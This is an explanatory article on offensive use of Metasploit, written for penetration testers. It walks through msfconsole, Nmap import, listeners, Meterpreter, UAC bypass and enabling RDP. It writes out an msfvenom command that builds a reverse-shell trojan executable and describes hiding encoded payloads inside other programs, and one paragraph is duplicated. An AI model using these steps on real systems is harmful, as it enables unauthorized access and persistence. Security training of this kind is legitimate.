This article discusses the method of exploiting services while illustrating how to use the Metasploit framework specifically. And Various ways will be presented and explained.
Metasploit is a vulnerability discovery and exploitation framework designed for penetration testers. The integrated interface for the Metasploit framework that comes with Kali Linux is msfconsole. Metasploit is separated into modules, which allow it to be dynamic and extensible.
Types of Modules
Exploits: An exploit module runs a set of commands to exploit a specific vulnerability in a system or application.
Buffer overflow, code injection, and web application exploits are all included in the exploit modules.
Payloads: The shell code that executes after an exploit effectively compromises a machine is called the payload.
The payload lets you specify how you want to connect to the shell and what you want to do with the target system once you’ve gained control.
Auxiliaries: An auxiliary module performs arbitrary actions that may not be related to exploitation.
Examples of auxiliary modules include scanners, fuzzers, and denial of service attacks.
Encoders: They are used to encrypt a payload to evade detection by endpoint security.
Some standard, widely used encoders are Non-AlphaNumeric, and BloXor. Most of Metasploit’s encoders are no longer efficient.
Metasploit supports a number of graphical interfaces in addition to the CLI interface. And Armitage is one of them. It is a sophisticated, interactive graphical user interface solution for managing exploited stations and sessions.
The msfdb init command is required to run the utility. All that remains is to launch the Armitage tool by typing Armitage into the command line.
- It is effortless to use and packed with various features.
- Preinstalled in Kali Linux & Free to use.
- It has both CLI and GUI interfaces.
- Contains all Metasploit’s modules and provides a GUI to exploit them.
It is similar to Armitage in that it is a graphical user interface (GUI) software for adversary simulations and red team operations.
The program simulates a solid social engineering process and provides unique reports to aid with blue team training.
- A more complex tool with advanced attack methods is included.
- Needs to be installed on the OS.
- It requires an expensive license. It has only a GUI interface.
- Contains extra tools beyond what Metasploit offers.
Command & Control
Having a setup can be very useful for keeping track of actions. Before using the database in Kali, the service Postgresql must be started.
In order to create and initialize the msf database, run msfdb init. Db_status in msfconsole can be used to confirm that Metasploit is successfully connected to the database.
Different actions can be organized into different sections, named workspace. Issuing a workspace in msfconsole will display the current workspaces.
The currently used workspace will be represented by * beside its name. Adding and deleting workspaces occurs using -a or -d, respectively, followed by the workspace name. Using workspace <name> will select and use a workspace.
msfconsole is the most common way of interacting with the Metasploit framework. In order to enter the console itself, type msfconsole into the command line.
The command search [term] in the console searches for all modules corresponding to the term. Selecting a module is done using the use keyword.
Integration with Nmap
Using the -ox switch, the results of an Nmap scan can be exported and used within Metasploit.
Using db_import[results], the results can be imported into Metasploit.
Nmap may be accessed from the console by typing db_nmap [flags] [target].
The integration of Metasploit with Nmap may aid in the tracking of hosts and the search for relevant payloads.
An attacker can use Metasploit to handle the target’s information after a successful import or scan. Particular keywords can display the database’s associated data: Hosts, Services, Vulnerabilities.
Manually installing modules
Due to its versatility, Metasploit allows for manually adding modules.
Added modules need to be added to /usr/share/Metasploit-framework/modules/
All Metasploit modules are written in Ruby, and customized scripts can be added with the right understanding. The Apt install Metasploit framework module will upgrade and update the framework.
Understanding the modules
Msfconsole has the complete module documentation. The commands listed below display information and options for any exploit: show options, show info.
Combining msfconsole documentation with internet research will yield the most meaningful findings.
After selecting a module to use, It will usually require configuration. All the settings can be set or reconfigured using set [name] [value].
The required settings will vary depending on the module. The most common settings in need of configuration are LHOST, LPORT, RHOST, and RPORT.
Executing a Module
Executing an exploit is as easy as typing an exploit or run after everything has been set up.
If everything is configured properly, the exploit will execute the payload that will do its part in the exploitation.
Resource scripts can be used to automate the use of msfconsole. The simplest approach to construct a script is to execute makerc [filename], which will save all of the commands for the current session.
Manually loading the scripts is possible by using msfconsole -r [file].
A Shell is an efficient textual interface to a computer.
A bind shell is a shell in which the target machine opens up a communication port or listener and waits for an incoming connection. The attacker then connects to the target machine’s listener.
A reverse shell is a shell in which the attacker machine communicates with the target machine. The connection is received by the attacking machine via a listener port.
A piece of malware known as a “trojan” must be injected into the targeted machine to establish a reverse shell. In response, the trojan will produce a shell that will call back to the msfconsole and grant access to the compromised station.
To create those payloads, Metasploit comes with a tool called msfvenom. For convenience, a unique shell called meterpreter is usually used with msfconsole.
Working of MSFVenom
Msfvenom is a vital tool for developing trojan payloads. Msfvenom’s payload can also be encoded and included within another executable application. The payload will be run concurrently with the application.
Msfvenom is a strong tool for developing trojan payloads. Msfvenom’s payload can also be encoded and included within another executable application. The payload will be run concurrently with the application.
The module options are set within the command. For example, msfvenom -p [payload] lhost=[lhost] lport=[lport].
Command: msfvenom -p windows/x64/powershell_reverse_tcp lhost=(IP address) -f exe -o payload.exe
The victim will establish a connection with the attacker by employing trojans. However, for this to occur, the attacker must first wait for the connection and respond.
A listener is a component that waits for a connection from an exploited system to arrive. In Metasploit, exploit/multi/handler is a module for creating and managing listeners. A multi/handler can generate and work with multiple listeners in separate sessions.
Getting a Remote Connection
Using a payload to acquire remote control will require a listener to be active. A listener is easily configured with exploit/multi/handler and can expect different types of payloads.
Meterpreter is a proprietary remote control shell toolkit that is extensively used due to its efficiency and lightness. The Meterpreter is not your average shell, and its commands try to mimic shell behavior.
The commands programmed into the meterpreter are intended to provide optimal control over an exploited target.
One of Metasploit’s stronger abilities is combining different exploits. Many different attacks can be achieved by using different combinations. In order to save the exploited session, Cntrl + z is used. Once you save it, you can use a different module as well.
Exploit/windows/local/bypassuac can be used on the previously generated session to allow system privilege escalation.
After completing the exploit, use run [module] to enable RDP on the computer for future use.
Advantages and disadvantages
|Very user-friendly and feature-rich.||Endpoints can now quickly discover encoders since they have been misused.|
|Contains a huge number of exploits and payloads that can be utilized at any time.||If used on an incompatible platform, it will most likely crash.|
|Can be modularized and altered, allowing for the design and import of new scripts.||Some modules work only occasionally. There is no guarantee that an exploit will work on a specific target.|
|Has both CLI & GUI interfaces.||Some functionalities necessitate running the exploit as an Administrator.|
|It supports automated tasks.||Some tasks require manual testing.|
Ways of Protection
Update Everything: The most important technique to keep a system safe from automated tools is to keep it updated. Automated tools typically appear only after a vulnerability has been discovered. As a result, keeping the system up to date is critical.
Endpoint Protection: The automated tools are simple; many low and mid-level hackers use them regularly, quickly becoming known to antiviruses. Endpoint security measures and a firewall that can halt threats are essential.
Begin Aware: Detecting malicious activity cannot undo what has been done, but it can prevent things from getting worse. Detecting an attack in its early stages can prevent huge losses that could occur later.